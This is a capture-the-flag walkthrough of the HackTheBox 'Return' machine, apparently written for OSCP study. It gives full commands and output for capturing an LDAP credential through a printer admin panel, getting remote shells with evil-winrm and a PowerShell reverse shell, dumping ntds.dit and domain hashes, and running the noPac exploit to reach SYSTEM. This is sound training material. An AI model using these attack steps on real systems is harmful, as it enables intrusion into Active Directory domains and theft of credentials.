Return | HackTheBox | OSCP Preparation

medium.com · SilentExploit · 11 days ago · tutorial
quality 3/10 · low quality
0 net
Tags
bug-bounty
Return | HackTheBox | OSCP Preparation | by SilentExploit - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Return | HackTheBox | OSCP Preparation Start off by setting the target machine's IP as an environment variable: SilentExploit Follow ~10 min read · March 24, 2026 (Updated: March 24, 2026) · Free: Yes ┌──(root㉿user)-[/home/user/SELOAD] └─# export target=10.129.95.241 ┌──(root㉿user)-[/home/user/SELOAD] └─# echo $target 10.129.95.241 Firstly, we want to run a nmap scan against the target. ┌──(root㉿user)-[/tmp/cert] └─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln -T5 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-23 21:04 PDT Initiating Parallel DNS resolution of 1 host. at 21:04 Completed Parallel DNS resolution of 1 host. at 21:04, 0.00s elapsed Initiating SYN Stealth Scan at 21:04 Scanning 10.129.95.241 [65535 ports] Discovered open port 135/tcp on 10.129.95.241 Discovered open port 139/tcp on 10.129.95.241 Discovered open port 53/tcp on 10.129.95.241 Discovered open port 445/tcp on 10.129.95.241 Discovered open port 80/tcp on 10.129.95.241 Discovered open port 49665/tcp on 10.129.95.241 Discovered open port 3269/tcp on 10.129.95.241 Discovered open port 389/tcp on 10.129.95.241 Discovered open port 389/tcp on 10.129.95.241 Discovered open port 5985/tcp on 10.129.95.241 Discovered open port 49666/tcp on 10.129.95.241 Discovered open port 47001/tcp on 10.129.95.241 Discovered open port 3268/tcp on 10.129.95.241 Discovered open port 49674/tcp on 10.129.95.241 Discovered open port 49688/tcp on 10.129.95.241 Discovered open port 49667/tcp on 10.129.95.241 Discovered open port 49675/tcp on 10.129.95.241 Discovered open port 49664/tcp on 10.129.95.241 Discovered open port 49697/tcp on 10.129.95.241 Discovered open port 49677/tcp on 10.129.95.241 Discovered open port 49677/tcp on 10.129.95.241 Discovered open port 464/tcp on 10.129.95.241 Discovered open port 593/tcp on 10.129.95.241 Discovered open port 49681/tcp on 10.129.95.241 Discovered open port 49673/tcp on 10.129.95.241 Discovered open port 9389/tcp on 10.129.95.241 Discovered open port 636/tcp on 10.129.95.241 Discovered open port 88/tcp on 10.129.95.241 Completed SYN Stealth Scan at 21:05, 40.63s elapsed (65535 total ports) Nmap scan report for 10.129.95.241 Host is up (0.12s latency). Not shown: 64098 closed tcp ports (reset), 1411 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49675/tcp open unknown 49677/tcp open unknown 49681/tcp open unknown 49688/tcp open unknown 49697/tcp open unknown Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 40.76 seconds Raw packets sent: 81990 (3.608MB) | Rcvd: 75090 (3.022MB) Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-23 21:05 PDT elapsed (1000 total ports) Completed NSE at 21:05, 5.86s elapsed Initiating NSE at 21:05 Completed NSE at 21:05, 0.00s elapsed Nmap scan report for 10.129.95.241 Host is up (0.13s latency). Not shown: 987 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: HTB Printer Admin Panel 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-23 20:24:20Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows PORT STATE SERVICE 53/tcp open domain 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.95.241 | Found the following possible CSRF vulnerabilities: | | Path: http://10.129.95.241:80/settings.php | Form id: |_ Form action: |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl |_ssl-ccs-injection: No reply from server (TIMEOUT) 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman Note : I have snipped some of the output from the above command as it is very lengthy but the important takeaways here are: Domain: return.local This was an interesting box because enumerating usernames in the usual way yielded no results and the guest account was locked. If you find yourself in this scenario; start enumerating the website and looking for any uncommon services running on the Nmap scan There was a web server open on port 80 which takes us here: Modify the /settings.php page to the following: - Server address: YOUR kali machine's IP - Server port: your listener's port Click 'update' to send yourself a reverse connection. This isn't a shell but it will give you the password credential for the svc-printer account. ┌──(root㉿user)-[/tmp/cert] └─# rlwrap nc -lvnp 389 listening on [any] 389 ... connect to [10.10.15.93] from (UNKNOWN) [10.129.95.241] 54685 0*`%return\svc-printer� 0*`%return\svc-printer� 1edFg43012!! With this, I began enumerating the target using NXC: ┌──(root㉿user)-[/tmp/cert] └─# nxc smb $target -u svc-printer -p '1edFg43012!!' --shares SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.129.95.241 445 PRINTER [+] return.local\svc-printer:1edFg43012!! SMB 10.129.95.241 445 PRINTER [*] Enumerated shares SMB 10.129.95.241 445 PRINTER Share Permissions Remark SMB 10.129.95.241 445 PRINTER ----- ----------- ------ SMB 10.129.95.241 445 PRINTER ADMIN$ READ Remote Admin SMB 10.129.95.241 445 PRINTER C$ READ,WRITE Default share SMB 10.129.95.241 445 PRINTER IPC$ READ Remote IPC SMB 10.129.95.241 445 PRINTER NETLOGON READ Logon server share SMB 10.129.95.241 445 PRINTER SYSVOL READ Logon server share ┌──(root㉿user)-[/tmp/cert] └─# nxc smb $target -u svc-printer -p '1edFg43012!!' --users SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.129.95.241 445 PRINTER [+] return.local\svc-printer:1edFg43012!! SMB 10.129.95.241 445 PRINTER -Username- -Last PW Set- -BadPW- -Description- SMB 10.129.95.241 445 PRINTER Administrator 2021-07-16 15:03:22 0 Built-in account for administering the computer/domain SMB 10.129.95.241 445 PRINTER Guest 0 Built-in account for guest access to the computer/domain SMB 10.129.95.241 445 PRINTER krbtgt 2021-05-20 13:26:54 0 Key Distribution Center Service Account SMB 10.129.95.241 445 PRINTER svc-printer 2021-05-26 08:15:13 0 Service Account for Printer SMB 10.129.95.241 445 PRINTER [*] Enumerated 4 local users: RETURN We have read/ write access on the C: — I had initially created a malicious LNK file to see if we could intercept any domain user hashes using lnkbomb but this failed. I then logged in as the compromised user via Evil-winrm: ┌──(root㉿user)-[/home/user/Downloads/noPac] └─# evil-winrm -i $target -u svc-printer -p '1edFg43012!!' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemtimePrivilege Change the system time Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled *Evil-WinRM* PS C:\Users\svc-printer\Documents> This is an EXTENSIVE list of privileges. This makes the path to administrator / domain compromise multifaceted so I will illustrate for you multiple ways of obtaining administrator privileges. Privilege Escalation Method 1: SeRestorePrivilege PS1 script Click on the Github repo link to grab the PS1 script and transfer it to the target machine: below is the output demonstrating how to use SeRestorePrivilege to get code execution as administrator. Jump over to revshell and grab yourself a base64 encoded powershell REVERSE shell. Add your IP and Port and then paste the powershell command (shown below) *Evil-WinRM* PS C:\Windows\Temp> Import-Module ./Invoke-SeRestoreAbuse.ps1 *Evil-WinRM* PS C:\Windows\Temp> Invoke-SeRestoreAbuse -Command 'cmd /c powershell -c " net user administrator Password123. The command completed successfully. Note: I prefer to get a shell as administrator to do change the password but you could technically replace the powershell reverse shell (in the evil-winrm session) with the command (above) to achieve the same result. I confirmed that the password change was successful for administrator then used NXC's built in module to dump the ntds.dit: ┌──(root㉿user)-[/home/user/SELOAD] └─# nxc smb $target -u administrator -p 'Password123.' SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.129.95.241 445 PRINTER [+] return.local\administrator:Password123. (Pwn3d!) ┌──(root㉿user)-[/home/user/SELOAD] └─# nxc smb $target -u administrator -p 'Password123.' -M ntdsutil SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.129.95.241 445 PRINTER [+] return.local\administrator:Password123. (Pwn3d!) NTDSUTIL 10.129.95.241 445 PRINTER [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\177430794 NTDSUTIL 10.129.95.241 445 PRINTER Dumping the NTDS, this could take a while so go grab a redbull... NTDSUTIL 10.129.95.241 445 PRINTER [+] NTDS.dit dumped to C:\Windows\Temp\177430794 NTDSUTIL 10.129.95.241 445 PRINTER [*] Copying NTDS dump to /tmp/tmp0m2ajky5 NTDSUTIL 10.129.95.241 445 PRINTER [*] NTDS dump copied to /tmp/tmp0m2ajky5 NTDSUTIL 10.129.95.241 445 PRINTER [+] Deleted C:\Windows\Temp\177430794 remote dump directory NTDSUTIL 10.129.95.241 445 PRINTER [+] Dumping the NTDS, this could take a while so go grab a redbull... NTDSUTIL 10.129.95.241 445 PRINTER Administrator:500:aad3b435b51404eeaad3b435b51404ee:fa7665befe243a5079d1c602f5524ce0::: NTDSUTIL 10.129.95.241 445 PRINTER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: NTDSUTIL 10.129.95.241 445 PRINTER PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:c927454eb1cfb39921a985d27c6698b0::: NTDSUTIL 10.129.95.241 445 PRINTER krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b::: NTDSUTIL 10.129.95.241 445 PRINTER return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e::: NTDSUTIL 10.129.95.241 445 PRINTER [+] Dumped 5 NTDS hashes to None.ntds of which 4 were added to the database NTDSUTIL 10.129.95.241 445 PRINTER [*] To extract only enabled accounts from the output file, run the following command: NTDSUTIL 10.129.95.241 445 PRINTER [*] grep -iv disabled None.ntds | cut -d ':' -f1 This is the golden key to the domain as it will dump the hashes for the domain users. This will enable you lateral movement but there is one caveat; the ntds.dit is stored ON THE DOMAIN CONTROLLER. Trying to dump the ntds.dit on a machine that is not the DC is fruitless. Privilege Escalation Method 2: SeBackUpPrivilege Dumping the Hives : a user with this privilege can back up the Windows registry hives — specifically the SAM , SYSTEM , and SECURITY files — is a post-exploitation technique used to extract the machine's "boot key," which then allows us to decrypt and dump local user credentials and cached password hashes for offline cracking or lateral movement. Follow the exact steps I outlined in Cicada to do this; you can then login as the administrator using the hash you receive after running impacket-secretsdump. Privilege Escalation Method 3: noPac Netexec has a built in module where you can check to see if a domain controller is vulnerable to nopac . The output below confirms that the TGTs requested are two different sizes which means …. it is vulnerable. ┌──(root㉿user)-[/home/user/Downloads] └─# nxc smb $target -u svc-printer -p '1edFg43012!!' -M nopac SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) SMB 10.129.95.241 445 PRINTER [+] return.local\svc-printer:1edFg43012!! NOPAC 10.129.95.241 445 PRINTER TGT with PAC size 1483 NOPAC 10.129.95.241 445 PRINTER TGT without PAC size 718 NOPAC 10.129.95.241 445 PRINTER NOPAC 10.129.95.241 445 PRINTER VULNERABLE NOPAC 10.129.95.241 445 PRINTER Next step: https://github.com/Ridter/noPac a) using nopac to dump the NT hash of the domain administrator dc-host is the NetBIOS computer name: PRINTER (as confirmed by all the NXC scans above) ┌──(venv)─(root㉿user)-[/home/user/Downloads/noPac] └─# python3 noPac.py return.local/svc-printer:'1edFg43012!!' -dc-ip $target -use-ldap -dc-host PRINTER --impersonate administrator -dump -just-dc-user administrator ███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██████ ██ ██ ██ ██████ [*] Current ms-DS-MachineAccountQuota = 10 [*] Selected Target PRINTER.return.local [*] will try to impersonate administrator [*] Already have user administrator ticket for target PRINTER.return.local [*] Pls make sure your choice hostname and the -dc-ip are same machine !! [*] Exploiting.. [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:fa7665befe243a5079d1c602f5524ce0::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:8e85953292c2deb573c1f7b784cb6c364935bd459d0e31b1496d91f16bee3bf2 Administrator:aes128-cts-hmac-sha1-96:9fd6cdd03aa2cac8c3e165d14714eefa Administrator:des-cbc-md5:8026f8f79bec75dc [*] Cleaning up... You can then use this hash to login via evil-winrm (or any other service) since it is treated as a plain text password for the purposes of authentication. ┌──(venv)─(root㉿user)-[/home/user/Downloads/noPac] └─# evil-winrm -i $target -u administrator -H fa7665befe243a5079d1c602f5524ce0 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami return\administrator b) getting a instant shell as administrator with nopac; no pass the hash required (not the best option imo) ┌──(venv)─(root㉿user)-[/home/user/Download┌──(venv)─(root㉿user)-[/home/user/Downloads/noPac] └─# python3 noPac.py return.local/svc-printer:'1edFg43012!!' -dc-ip $target -use-ldap -dc-host PRINTER -shell --impersonate administrator ███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██████ ██ ██ ██ ██████ [*] Current ms-DS-MachineAccountQuota = 10 [*] Selected Target PRINTER.return.local [*] will try to impersonate administrator [*] Adding Computer Account "WIN-YAW3WZHOYRP$" [*] MachineAccount "WIN-YAW3WZHOYRP$" password = dbzaCIh)AQzJ [*] Successfully added machine account WIN-YAW3WZHOYRP$ with password dbzaCIh)AQzJ. [*] WIN-YAW3WZHOYRP$ object = CN=WIN-YAW3WZHOYRP,CN=Computers,DC=return,DC=local [*] WIN-YAW3WZHOYRP$ sAMAccountName == PRINTER [*] Saving a DC's ticket in PRINTER.ccache [*] Reseting the machine account to WIN-YAW3WZHOYRP$ [*] Restored WIN-YAW3WZHOYRP$ sAMAccountName to original value [*] Using TGT from cache [*] Impersonating administrator [*] Requesting S4U2self [*] Saving a user's ticket in administrator.ccache [*] Rename ccache to administrator_PRINTER.return.local.ccache [*] Attempting to del a computer with the name: WIN-YAW3WZHOYRP$ [-] Delete computer WIN-YAW3WZHOYRP$ Failed! Maybe the current user does not have permission. [*] Pls make sure your choice hostname and the -dc-ip are same machine !! [*] Exploiting.. [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>whoami nt authority\system #hacking #ctf #bug-bounty #bug-bounty-tips #tech Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories